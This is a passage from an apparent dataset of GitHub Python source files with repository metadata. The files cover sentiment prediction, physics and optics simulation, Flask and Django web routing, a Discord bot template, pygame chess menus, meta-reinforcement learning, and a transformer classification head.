accuracy_score(target(phrases), pred)\n\n def error_matrix(self, phrases):\n predictions = self.predict(phrases)\n matrix = defaultdict(list)\n for phrase, predicted in zip(phrases, predictions):\n if phrase.sentiment != predicted:\n matrix[(phrase.sentiment, predicted)].append(phrase)\n return matrix\n\nclass DuplicatesHandler:\n def fit(self, phrases, target):\n self.dupes = {}\n for phrase, label in zip(phrases, target):\n self.dupes[self._key(phrase)] = label\n\n def get(self, phrase):\n key = self._key(phrase)\n return self.dupes.get(key)\n\n def _key(self, x):\n return \" \".join(x.content.lower().split())\n\n\nclass _Baseline:\n def fit(self, X, y=None):\n return self\n\n def predict(self, X):\n return [\"2\" for _ in X]\n\n def score(self, X):\n gold = target(X)\n pred = self.predict(X)\n return accuracy_score(gold, pred)\n","repo_name":"kevinhsu/Semi-supervised-Recursive-Autoencoders-for-Opinion-Detection-on-Twitter","sub_path":"sa/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":7839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"71501398199","text":"#!/usr/bin/env python\n\"\"\"\nCreate an xyz file for one particle\n\"\"\"\nimport os, sys, commands\nimport Numeric, math\n\ndef main():\n\n pi = math.pi\n t = Numeric.arange(10000,typecode=Numeric.Float)*0.01\n x = Numeric.sin(2*pi*1.1*t)\n y = Numeric.sin(2*pi*2.0*t)\n z = Numeric.sin(2*pi*2.7*t)\n \n out = open('ATOM.xyz','w')\n for i in range(len(t)):\n out.write('1\\n'+str(i)+'\\n')\n out.write('N '+str(x[i])+' '+str(y[i])+' '+str(z[i])+'\\n')\n out.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"boates/physics","sub_path":"generate_xyz_trajectory.py","file_name":"generate_xyz_trajectory.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"30736807100","text":"\nimport discord\nfrom dotenv import *\n\nload_dotenv(\"token.env\")\n\n\nclient = discord.Client(intents = discord.Intents.all())\n\n@client.event\nasync def on_ready():\n print(f\"{client.user} is now running\")\n await client.change_presence(status=discord.Status.dnd)\n\n\nclient.run(get_key(\"TOKEN\"))","repo_name":"Immortal-youtube/Project-CLI","sub_path":"pythonDiscordTemplate/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"72270998839","text":"from flask_app import app\nfrom flask import render_template,redirect,request\nfrom flask_app.models.user import User\n\n@app.route('/')\ndef index():\n users = User.get_all()\n return render_template('index.html', users=users)\n\n@app.route('/users/new')\ndef new_user():\n\n return render_template('new_user.html')\n\n@app.route('/users/create',methods=['POST'])\ndef create():\n User.create(request.form)\n return redirect('/')\n\n@app.route('/users/show/')\ndef showone(user_id):\n data ={\n 'id':user_id\n }\n user = User.get_one(data)\n print(user)\n return render_template('one_user.html',user=user)\n\n\n@app.route('/users/show//edit')\ndef edit(user_id):\n user = User.get_one({'id':user_id})\n return render_template('edit.html',user = user)\n\n\n@app.route('/users/update//', methods=['post'])\ndef updateuser(user_id):\n User.update(request.form)\n return redirect('/')\n\n@app.route('/users/delete//')\ndef remove(user_id):\n data ={\n 'id':user_id\n }\n User.delete(data)\n return redirect('/')\n\n \n","repo_name":"youssefch2003/Python_Stack","sub_path":"week2/user crud modularized/flask_app/controllers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27143986701","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#####################################\n# File name : trans_tf_torch.py\n# Create date : 2019-03-16 14:49\n# Modified date : 2019-03-20 14:39\n# Author : DARREN\n# Describe : not set\n# Email : lzygzh@126.com\n#####################################\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport json\n\ndef load_tf_weights_in_openai_gpt(model, openai_checkpoint_folder_path):\n \"\"\" Load tf pre-trained weights in a pytorch model (from NumPy arrays here)\n \"\"\"\n import re\n import numpy as np\n print(\"Loading weights...\")\n names = json.load(open(openai_checkpoint_folder_path + '/parameters_names.json', \"r\", encoding='utf-8'))\n shapes = json.load(open(openai_checkpoint_folder_path + '/params_shapes.json', \"r\", encoding='utf-8'))\n offsets = np.cumsum([np.prod(shape) for shape in shapes])\n init_params = [np.load(openai_checkpoint_folder_path + '/params_{}.npy'.format(n)) for n in range(10)]\n init_params = np.split(np.concatenate(init_params, 0), offsets)[:-1]\n init_params = [param.reshape(shape) for param, shape in zip(init_params, shapes)]\n\n # This was used when we had a single embedding matrix for positions and tokens\n # init_params[0] = np.concatenate([init_params[1], init_params[0]], 0)\n # del init_params[1]\n init_params = [arr.squeeze() for arr in init_params]\n\n try:\n assert model.tokens_embed.weight.shape == init_params[1].shape\n assert model.positions_embed.weight.shape == init_params[0].shape\n except AssertionError as e:\n e.args += (model.tokens_embed.weight.shape, init_params[1].shape)\n e.args += (model.positions_embed.weight.shape, init_params[0].shape)\n raise\n\n model.tokens_embed.weight.data = torch.from_numpy(init_params[1])\n model.positions_embed.weight.data = torch.from_numpy(init_params[0])\n names.pop(0)\n # Pop position and token embedding arrays\n init_params.pop(0)\n init_params.pop(0)\n\n for name, array in zip(names, init_params): # names[1:n_transfer], init_params[1:n_transfer]):\n name = name[6:] # skip \"model/\"\n assert name[-2:] == \":0\"\n name = name[:-2]\n name = name.split('/')\n pointer = model\n for m_name in name:\n if re.fullmatch(r'[A-Za-z]+\\d+', m_name):\n l = re.split(r'(\\d+)', m_name)\n else:\n l = [m_name]\n if l[0] == 'g':\n pointer = getattr(pointer, 'weight')\n elif l[0] == 'b':\n pointer = getattr(pointer, 'bias')\n elif l[0] == 'w':\n pointer = getattr(pointer, 'weight')\n else:\n pointer = getattr(pointer, l[0])\n if len(l) >= 2:\n num = int(l[1])\n pointer = pointer[num]\n try:\n assert pointer.shape == array.shape\n except AssertionError as e:\n e.args += (pointer.shape, array.shape)\n raise\n try:\n assert pointer.shape == array.shape\n except AssertionError as e:\n e.args += (pointer.shape, array.shape)\n raise\n print(\"Initialize PyTorch weight {}\".format(name))\n pointer.data = torch.from_numpy(array)\n return model\n","repo_name":"darr/gpt2","sub_path":"openai_gpt/gpt/base_gpt/trans_tf_torch.py","file_name":"trans_tf_torch.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"7183411894","text":"import pygame\nimport random\nimport time\nfrom characters.boomerang import boom_pic\n\n\nclass Displays:\n def __init__(self):\n self.boom_pic = boom_pic\n self.rectangle = None\n\n self.time_left = None\n self.life_time = 6\n self.timer = time.time()\n self.is_collected = True\n self.random_loc = -100, -100\n\n def draw(self, screen, boom_number):\n self.lives(screen, boom_number)\n self.extra_life(screen)\n\n @staticmethod\n def lives(screen, boom_number):\n for i in range(boom_number):\n screen.blit(boom_pic, (10 + i * 30, 10))\n\n @staticmethod\n def score(screen, score):\n a_text = pygame.font.SysFont(\"monospace\", 30).render('Score: {}'.format(score), True, (255, 255, 255))\n a_rect = a_text.get_rect(center=(650, 20))\n screen.blit(a_text, a_rect)\n\n def extra_life(self, screen):\n if time.time() - self.timer > random.randrange(20, 30):\n self.timer = time.time()\n self.is_collected = False\n self.random_loc = random.randrange(200, 500), random.randrange(200, 400)\n\n self.time_left = self.life_time + self.timer - time.time()\n if self.time_left > 0 and not self.is_collected:\n self.rectangle = self.boom_pic.get_rect(center=self.random_loc)\n self.extra_boom_level(screen, self.random_loc, self.life_time, int(self.time_left))\n screen.blit(self.boom_pic, self.random_loc)\n else:\n self.is_collected = True\n\n @staticmethod\n def extra_boom_level(screen, pos, hp_max, hp):\n for i in range(1, hp_max + 1):\n rect_w = 24/hp_max\n if i <= hp:\n colour = (4, 160, 34)\n else:\n colour = (180, 20, 34)\n pygame.draw.rect(screen, colour, pygame.Rect(pos[0] - 5 + i*rect_w, pos[1] - 8, rect_w, 3))\n","repo_name":"mikolajszym00/Pygame_LateInTheEvening","sub_path":"displays/displays.py","file_name":"displays.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42414516743","text":"import pygame as p\n\nfrom app.GUI.ModeWindow.PVC import PVC\nfrom app.GUI.ModeWindow.RankingWindow import RankingWindow\nfrom app.Modes.PvPLocal import game\nfrom app.config import MAX_FRAMERATE\n\n\nclass ModeWindow:\n def __init__(self):\n p.init()\n self.clock = p.time.Clock()\n self.WIDTH, self.HEIGHT = 512, 512\n self.WHITE = p.Color(\"White\")\n self.BLACK = p.Color(\"Black\")\n self.HOVER_WHITE = p.Color(225, 225, 225)\n self.HOVER_BLACK = p.Color(65, 65, 65)\n self.running = True\n\n self.screen = p.display.set_mode((self.WIDTH, self.HEIGHT))\n self.clock = p.time.Clock()\n p.display.set_caption(\"CHESS ME!\")\n self.font1 = p.font.SysFont(\"Arial\", 30, bold=True)\n self.font2 = p.font.SysFont(\"Arial\", 20, bold=True)\n self.font3 = p.font.SysFont(\"Arial\", 16, bold=True)\n self.font4 = p.font.SysFont(\"Arial\", 10)\n self.button_rects = []\n self.button_width = 300\n self.button_height = 70\n self.button_padding = 20\n self.button_x = (self.WIDTH - self.button_width) // 2\n self.button_y = self.HEIGHT // 4\n\n self.label1_x = (self.WIDTH - self.font1.render(\"CHESS.ME.COM\", True, self.BLACK).get_width()) // 2\n self.label1_y = self.button_y - self.font1.get_height() - 60\n\n self.label2_x = (self.WIDTH - self.font2.render(\"CHESS.COM SUCKS, WE ARE BETTER\", True,\n self.BLACK).get_width()) // 2\n self.label2_y = self.button_y - self.font2.get_height() - 20\n\n self.btn_images = [\n p.transform.scale(p.image.load(\"../resources/ChessImg/bN.png\").convert_alpha(),\n (int(self.button_height * 0.6), int(self.button_height * 0.6))),\n p.transform.scale(p.image.load(\"../resources/ChessImg/wQ.png\").convert_alpha(),\n (int(self.button_height * 0.6), int(self.button_height * 0.6))),\n p.transform.scale(p.image.load(\"../resources/ChessImg/bR.png\").convert_alpha(),\n (int(self.button_height * 0.6), int(self.button_height * 0.6))),\n p.transform.scale(p.image.load(\"../resources/ChessImg/wB.png\").convert_alpha(),\n (int(self.button_height * 0.6), int(self.button_height * 0.6)))\n ]\n\n def draw_buttons(self):\n button_texts = [\"Player VS Computer\", \"Player VS Player [Local]\", \"Top Players\", \"Load Your Last Game\"]\n\n for i in range(4):\n button_rect = p.Rect(self.button_x, self.button_y + i * (self.button_height + self.button_padding),\n self.button_width, self.button_height)\n\n if i % 2:\n button_color = self.BLACK\n text_color = self.WHITE\n else:\n button_color = self.WHITE\n text_color = self.BLACK\n\n if button_rect.collidepoint(p.mouse.get_pos()):\n if i % 2:\n button_color = self.HOVER_BLACK\n else:\n button_color = self.HOVER_WHITE\n\n p.draw.rect(self.screen, button_color, button_rect, 0)\n p.draw.rect(self.screen, self.BLACK, button_rect, 2)\n\n button_image_x = self.button_x + 10\n button_image_y = self.button_y + i * (self.button_height + self.button_padding) + (\n self.button_height - self.btn_images[i].get_height()) // 2\n self.screen.blit(self.btn_images[i], (button_image_x, button_image_y))\n\n label = self.font3.render(button_texts[i], True, text_color)\n label_x = self.button_x + self.button_width // 2 - label.get_width() // 2\n label_y = self.button_y + i * (self.button_height + self.button_padding) + (\n self.button_height - label.get_height()) // 2\n self.screen.blit(label, (label_x, label_y))\n\n def handle_button_click(self, event):\n button_index = -1\n\n for i in range(4):\n\n button_rect = p.Rect(self.button_x, self.button_y + i * (self.button_height + self.button_padding),\n self.button_width, self.button_height)\n\n if button_rect.collidepoint(event.pos):\n button_index = i\n break\n\n if button_index != -1:\n\n if button_index == 0:\n PVC().run()\n elif button_index == 1:\n game()\n elif button_index == 2:\n RankingWindow().run()\n elif button_index == 3:\n PVC().handle_load_button_click()\n\n self.running = False\n p.quit()\n\n def draw(self):\n\n self.screen.fill(self.WHITE)\n self.draw_buttons()\n\n label1 = self.font1.render(\"CHESS.ME.COM\", True, self.BLACK)\n self.screen.blit(label1, (self.label1_x, self.label1_y))\n\n label2 = self.font2.render(\"CHESS.COM SUCKS, WE ARE BETTER\", True, self.BLACK)\n self.screen.blit(label2, (self.label2_x, self.label2_y))\n\n p.display.flip()\n\n def run(self):\n\n while self.running:\n\n for event in p.event.get():\n\n if event.type == p.QUIT:\n self.running = False\n p.quit()\n\n elif event.type == p.MOUSEBUTTONUP:\n self.handle_button_click(event)\n self.running = False\n\n if self.running:\n self.draw()\n self.clock.tick(MAX_FRAMERATE)\n\n p.quit()\n","repo_name":"AntuanW/ChessApp","sub_path":"app/GUI/ModeWindow/ModeWindow.py","file_name":"ModeWindow.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19770968299","text":"#!/usr/bin/env python3\n\n# =============================================================================\n# Example file for creating a coronagraphic/non-coronagraphic PSF\n# =============================================================================\n\n# Required libraries\nimport proper # library for propagation of wavefront\nimport matplotlib.pyplot as plt # for plotting simulated PSFs\nimport numpy as np\nfrom astropy.io import fits # to read and write fits files\n\nfrom simulation_config import *\t# Loads default configuration for simulation \nfrom heeps import * # loads all HEEPS scripts required for simuation\n\n\"\"\"\nDefault simulation cofiguration defined in \"simulation_config.py\" can be overridden here\n\"\"\"\nwavelength = 3.80*10**-6\ncharge = 2 # charge is modified here\n\n\n# =============================================================================\n# ELT Pupil Plane\n# =============================================================================\n\n(npupil, wfo) = pupil(diam, gridsize, spiders_width, spiders_angle, pixelsize, \n r_obstr, wavelength, pupil_file=pupil_file, missing_segments_number=0, \n Debug=True, Debug_print=Debug_print, prefix=prefix) \n\n# =============================================================================\n# Wavefront abberations\n# =============================================================================\n\nwavefront_abberations(wfo, npupil, atm_screen, NCPA,Island_Piston,TILT=TILT, \n Debug='False', Debug_print='False', prefix='test') \n\n# =============================================================================\n# Coronagraph selection -- Vortex Classical (VC) / RAVC / APP --\n# =============================================================================\n\"\"\"\n1. By changing the \"coronagraph_type\" to \"VC/RAVC/APP\" coronagraphs can be selcted. \n2. If the input is \"None\" a non-coronagraphic PSF with lyot-stop is generated\n3. If the input is anything except above keywords a normal PSF is generated\n\"\"\"\n\ncoronagraph_type = 'RAC'\n\ncoronagraphs(wfo, r_obstr,npupil, phase_apodizer_file,amplitude_apodizer_file,\n apodizer_misalignment,charge,f_lens,diam,LS_amplitude_apodizer_file,LS_misalignment,\n LS,LS_parameters,spiders_angle, LS_phase_apodizer_file, Debug_print,pixelsize, \n Debug,coronagraph_type= coronagraph_type)\n\n# =============================================================================\n# Detector plane\n# =============================================================================\npsf = detector(wfo,f_lens,nd,coronagraph_type,prefix,Debug=True)\t\n\n\nplt.figure()\nplt.imshow(np.sqrt(psf))\nplt.colorbar()\n\nplt.show()\n\n","repo_name":"ppathak8/heeps_old_version","sub_path":"example_coronagraph_psf.py","file_name":"example_coronagraph_psf.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39355720519","text":"\nfrom pearl.envs import ENVS\nfrom pearl.envs.env import NormalizedBoxEnv\nfrom pearl.policy import TanhGaussianPolicy\nfrom pearl.network import FlattenMLP, MLPEncoder # , RecurrentEncoder\nfrom pearl.sac import PEARLSoftActorCritic\nfrom pearl.agent import PEARLAgent\nfrom pearl.launcher import setup_logger\nfrom pearl.configs.default import default_config\n\n\nfrom timeseries.config import Config\nfrom timeseries.model import TSModel\n# from timeseries.data_process import DataScheduler\nfrom timeseries.data_process_v2_0 import DataScheduler\nfrom timeseries.rl import MyEnv\n\nimport os\nimport pathlib\nimport numpy as np\n\n\ndef deep_update_dict(fr, to):\n ''' update dict of dicts with new values '''\n # assume dicts have same keys\n for k, v in fr.items():\n if type(v) is dict:\n deep_update_dict(v, to[k])\n else:\n to[k] = v\n return to\n\n\ndef main():\n ts_configs = Config()\n # get data for all assets and dates\n ds = DataScheduler(ts_configs, data_type='kr_stock')\n\n model = TSModel(ts_configs)\n # ts_configs.f_name = 'ts_model_test_info1.1_mtl' #: ds.set_idx(6000)\n # ts_configs.f_name = 'ts_model_test_info1.2_mtl' #: not ds.set_idx()\n # ts_configs.f_name = 'ts_model_test_info1.3_mtl' #: bbticker test with ds.set_idx(6000)\n # ts_configs.f_name = 'ts_model_test_info_mtl_us_1_1' #: us 2500\n # ts_configs.f_name = 'ts_model_test_info_mtl_us_1_2' #: us every\n ts_configs.f_name = 'kr_mtl_dg_dynamic_1_0_mlarge4' #: kr every\n\n if os.path.exists(ts_configs.f_name + '.pkl'):\n model.load_model(ts_configs.f_name)\n\n ds.set_idx(4000)\n ds.test_end_idx = ds.base_idx + 1000\n ii = 0\n while not ds.done:\n if ii % 1 == 0:\n # if ii == 0:\n ds.train(model,\n train_steps=1,\n eval_steps=10,\n save_steps=200,\n early_stopping_count=10,\n model_name=ts_configs.f_name,\n plot_train=False)\n\n model.save_model(\"./out/{}/{}/{}\".format(ts_configs.f_name, ds.base_idx, ts_configs.f_name))\n ds.test(model,\n each_plot=False,\n out_dir=os.path.join(ds.data_out_path, ts_configs.f_name, 'test_linear_train'),\n file_nm='test_{}.png'.format(ii),\n ylog=False)\n\n # ds.finetune(model, train_steps=10)\n\n ds.next()\n ii += 1\n\n # env = MyEnv(model, data_scheduler=ds, configs=ts_configs, trading_costs=0.001)\n\n env_name = 'korea-stock'\n variant = default_config\n variant['env_name'] = env_name\n #\n # with open(\"./configs/{}.json\".format(env_name)) as f:\n # exp_params = json.load(f)\n # variant = deep_update_dict(exp_params, variant)\n\n env = NormalizedBoxEnv(ENVS[variant['env_name']](model, ds, ts_configs, **variant['env_params']))\n tasks = env.get_all_task_idx()\n obs_dim = int(np.prod(env.observation_space.shape))\n action_dim = int(np.prod(env.action_space.shape))\n\n # instantiate networks\n latent_dim = variant['latent_size']\n context_encoder = latent_dim * 2 if variant['algo_params']['use_information_bottleneck'] else latent_dim\n reward_dim = 1\n net_size = variant['net_size']\n recurrent = variant['algo_params']['recurrent']\n # encoder_model = RecurrentEncoder if recurrent else MlpEncoder\n encoder_model = MLPEncoder\n\n context_encoder = encoder_model(\n hidden_sizes=[200, 200, 200],\n input_size=obs_dim + action_dim + reward_dim,\n output_size=context_encoder,\n )\n qf1 = FlattenMLP(\n hidden_sizes=[net_size, net_size, net_size],\n input_size=obs_dim + action_dim + latent_dim,\n output_size=1,\n )\n qf2 = FlattenMLP(\n hidden_sizes=[net_size, net_size, net_size],\n input_size=obs_dim + action_dim + latent_dim,\n output_size=1,\n )\n vf = FlattenMLP(\n hidden_sizes=[net_size, net_size, net_size],\n input_size=obs_dim + latent_dim,\n output_size=1,\n )\n target_vf = FlattenMLP(\n hidden_sizes=[net_size, net_size, net_size],\n input_size=obs_dim + latent_dim,\n output_size=1,\n )\n policy = TanhGaussianPolicy(\n hidden_sizes=[net_size, net_size, net_size],\n obs_dim=obs_dim + latent_dim,\n latent_dim=latent_dim,\n action_dim=action_dim,\n )\n agent = PEARLAgent(\n latent_dim,\n context_encoder,\n policy,\n **variant['algo_params']\n )\n algorithm = PEARLSoftActorCritic(\n env=env,\n train_tasks=list(tasks[:variant['env_params']['n_tasks_dict']['train']]),\n eval_tasks=list(tasks[-variant['env_params']['n_tasks_dict']['eval']:]),\n nets=[agent, qf1, qf2, vf, target_vf],\n latent_dim=latent_dim,\n **variant['algo_params']\n )\n\n def example():\n train_tasks = list(tasks[:variant['env_params']['n_tasks_dict']['train']])\n meta_batch = 64\n indices = np.random.choice(train_tasks, meta_batch)\n\n\n # debugging triggers a lot of printing and logs to a debug directory\n DEBUG = variant['util_params']['debug']\n os.environ['DEBUG'] = str(int(DEBUG))\n\n # create logging directory\n # TODO support Docker\n exp_id = 'debug' if DEBUG else None\n experiment_log_dir = setup_logger(variant['env_name'], variant=variant, exp_id=exp_id, base_log_dir=variant['util_params']['base_log_dir'])\n\n # optionally save eval trajectories as pkl files\n if variant['algo_params']['dump_eval_paths']:\n pickle_dir = experiment_log_dir + '/eval_trajectories'\n pathlib.Path(pickle_dir).mkdir(parents=True, exist_ok=True)\n\n # run the algorithm\n algorithm.train()\n","repo_name":"ainklain/mynlp","sub_path":"pearl/main_pearl.py","file_name":"main_pearl.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9009999836","text":"\"\"\"bbook_backend URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\nhttps://docs.djangoproject.com/en/2.0/topics/http/urls/\n\nThe `djx.urls:load_urls` utility is used to automatically include all\nurl patterns from `urls.py` modules in project subdirectories.\n\nFor example, `bbook_backend.api.urls:urlpatterns` will be routed\nunder the \"/api\" prefix.\n\"\"\"\n\nfrom django.conf.urls import (\n include,\n url,\n)\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom inspect import isclass\nfrom dynamic_rest.routers import DynamicRouter\nfrom bbook_backend.api import views\nfrom rest_framework.authtoken import views as authtoken_views\n\n\nurlpatterns = []\nif 'django.contrib.admin' in settings.INSTALLED_APPS:\n urlpatterns.append(\n url(r'^admin/', admin.site.urls)\n )\n\n\nrouter = DynamicRouter()\n\n\ndef register_views(views):\n for name in dir(views):\n view = getattr(views, name)\n if (\n isclass(view) and\n getattr(view, 'serializer_class', None) and\n getattr(view, 'IS_CANONICAL', True)\n ):\n router.register_resource(view, namespace='v0')\n\n\nregister_views(views)\n\n\nrouter.register(r'v0/story_recordings', views.StoryRecordingViewSet)\n\n\nurlpatterns.extend([\n url(r'^', include(router.urls)),\n url(r'^api-token-auth/', authtoken_views.obtain_auth_token),\n url(r'^rest-auth/', include('rest_auth.urls')),\n url(r'^rest-auth/registration/', include('rest_auth.registration.urls'))\n])\n","repo_name":"rgangopadhya/b-book-backend","sub_path":"bbook_backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34147030392","text":"import copy\nimport math\n\nimport torch\nimport torch.nn.functional as F\nfrom detectron2.layers import DepthwiseSeparableConv2d\nfrom timm.models.layers import DropPath\nfrom torch import Tensor, nn\nfrom torch.functional import Tensor\nfrom torch.nn import MultiheadAttention\n\n\nclass GroupWiseLinear(nn.Module):\n # could be changed to:\n # output = torch.einsum('ijk,zjk->ij', x, self.W)\n # or output = torch.einsum('ijk,jk->ij', x, self.W[0])\n def __init__(self, num_class, hidden_dim, bias=True):\n super().__init__()\n self.num_class = num_class\n self.hidden_dim = hidden_dim\n self.bias = bias\n\n self.W = nn.Parameter(torch.Tensor(1, num_class, hidden_dim))\n if bias:\n self.b = nn.Parameter(torch.Tensor(1, num_class))\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1.0 / math.sqrt(self.W.size(2))\n for i in range(self.num_class):\n self.W[0][i].data.uniform_(-stdv, stdv)\n if self.bias:\n for i in range(self.num_class):\n self.b[0][i].data.uniform_(-stdv, stdv)\n\n def forward(self, x):\n # x: B,K,d\n x = (self.W * x).sum(-1)\n if self.bias:\n x = x + self.b\n return x\n\n\nclass MultiLabelHead(nn.Module):\n def __init__(\n self,\n num_classes,\n d_encoder,\n hidden_dim,\n n_heads,\n d_ff,\n dropout,\n share_embedding,\n downsample=None,\n mlp=True,\n droppath=0,\n ):\n super().__init__()\n self.share_embedding = share_embedding\n self.mlp = mlp\n self.block = Block(hidden_dim, n_heads, d_ff, dropout, droppath)\n self.norm = nn.LayerNorm(hidden_dim)\n self.num_classes = num_classes\n self.fc = GroupWiseLinear(num_classes, hidden_dim)\n\n if not share_embedding:\n self.cls_emb = nn.Parameter(torch.randn(1, num_classes, hidden_dim))\n from torch.nn.init import trunc_normal_\n\n trunc_normal_(self.cls_emb, std=0.02)\n self.scale = hidden_dim ** -0.5\n\n self.proj_dec = nn.Linear(d_encoder, hidden_dim)\n self.downsample = downsample\n if downsample:\n self.pooling = nn.AdaptiveAvgPool2d(downsample)\n\n def forward(self, x):\n if self.share_embedding:\n x, cls_emb = x\n cls_emb = cls_emb.unsqueeze(0)\n else:\n cls_emb = self.cls_emb\n if self.downsample:\n x = self.pooling(x)\n\n B, C = x.size()[:2]\n x = x.view(B, C, -1).permute(0, 2, 1)\n x = self.proj_dec(x)\n\n cls_emb = cls_emb.expand(x.size(0), -1, -1)\n x = torch.cat((x, cls_emb), 1)\n x = self.block(x)\n x = self.norm(x)\n cls_emb = x[:, -self.num_classes :]\n img_pred = self.fc(cls_emb)\n\n return img_pred\n\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, hidden_dim, dropout, out_dim=None):\n super().__init__()\n self.fc1 = nn.Linear(dim, hidden_dim)\n self.act = nn.GELU()\n if out_dim is None:\n out_dim = dim\n self.fc2 = nn.Linear(hidden_dim, out_dim)\n self.drop = nn.Dropout(dropout)\n\n @property\n def unwrapped(self):\n return self\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, heads, dropout):\n super().__init__()\n self.heads = heads\n head_dim = dim // heads\n self.scale = head_dim ** -0.5\n self.attn = None\n\n self.qkv = nn.Linear(dim, dim * 3)\n self.attn_drop = nn.Dropout(dropout)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(dropout)\n # from .mask_transformer_head import MatmalFlopsCounter\n # self.matmul = MatmalFlopsCounter()\n\n @property\n def unwrapped(self):\n return self\n\n def forward(self, x, mask=None):\n B, N, C = x.shape\n qkv = (\n self.qkv(x)\n .reshape(B, N, 3, self.heads, C // self.heads)\n .permute(2, 0, 3, 1, 4)\n )\n q, k, v = (\n qkv[0],\n qkv[1],\n qkv[2],\n )\n\n attn = q @ k.transpose(-2, -1) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n\n return x, attn\n\n\nclass Block(nn.Module):\n def __init__(self, dim, heads, mlp_dim, dropout, drop_path):\n super().__init__()\n self.norm1 = nn.LayerNorm(dim)\n self.norm2 = nn.LayerNorm(dim)\n self.attn = Attention(dim, heads, dropout)\n self.mlp = FeedForward(dim, mlp_dim, dropout)\n self.drop_path = DropPath(drop_path) if drop_path > 0.0 else nn.Identity()\n\n def forward(self, x, mask=None, return_attention=False):\n y, attn = self.attn(self.norm1(x), mask)\n if return_attention:\n return attn\n x = x + self.drop_path(y)\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass DecoderLinear(nn.Module):\n def __init__(self, n_cls, patch_size, d_encoder):\n super().__init__()\n\n self.d_encoder = d_encoder\n self.patch_size = patch_size\n self.n_cls = n_cls\n\n self.head = nn.Linear(self.d_encoder, n_cls)\n self.apply(init_weights)\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return set()\n\n def forward(self, x, im_size):\n H, W = im_size\n GS = H // self.patch_size\n x = self.head(x)\n B, HW, C = x.size()\n x = x.view(B, GS, HW // GS, C).permute(0, 3, 1, 2)\n # x = rearrange(x, \"b (h w) c -> b c h w\", h=GS)\n\n return x\n\n\nclass Mlp(nn.Module):\n \"\"\"MLP as used in Vision Transformer, MLP-Mixer and related networks\"\"\"\n\n def __init__(\n self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU\n ):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.fc2(x)\n return x\n","repo_name":"openseg-group/RankSeg","sub_path":"mask2former/mask2former/modeling/multilabel_head.py","file_name":"multilabel_head.py","file_ext":"py","file_size_in_byte":6479,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"40"} +{"seq_id":"70377914040","text":"'''\n숫자 카드 게임은 여러 개의 숫자 카드 중에서 가장 높은 숫자가 쓰인 카드 한 장을 뽑는 게임\n1. 숫자가 쓰인 카드들이 N*M 형태로 높여 있다.(N은 행, M은 열)\n2. 먼저 뽑고자 하는 카드가 포함되어 있는 행을 선택한다.\n3. 그 다음 선택된 행에 포함된 카드들 중 가장 숫자가 낮은 카드를 뽑아야 한다.\n4. 처음에 카드를 골라낼 행을 선택할 때, 이후에 해당 행에서 가장 숫자가 낮은 카드를 뽑을 것을 고려하여\n최종적으로 가장 높은 숫자의 카드를 뽑을 수 있도록 전략을 세워야 한다.\n'''\n\nn, m = map(int, input().split())\nresult = 0\n\nfor i in range(n):\n row = list(map(int, input().split()))\n minNum = min(row)\n result = max(result, minNum)\n\nprint(result)","repo_name":"ssum-dal/CodingTest","sub_path":"이코테/그리디/숫자카드게임.py","file_name":"숫자카드게임.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73948427959","text":"# coding = utf-8\n\ndef get_target():\n\n f = open(r\"C:\\Users\\Yong Cao\\Downloads\\Belsom_Rappsilber_sulfoSDA.csv\", 'r').readlines()\n\n b =open(\"report.csv\", 'w')\n\n spec_dic = {}\n pep_dic = {}\n for line in f[1:]:\n linelist = line.split(\",\")\n raw = linelist[1]\n xlink = linelist[8:12]\n print(linelist[8:12])\n if raw not in spec_dic:\n spec_dic[raw] = 1\n else:\n 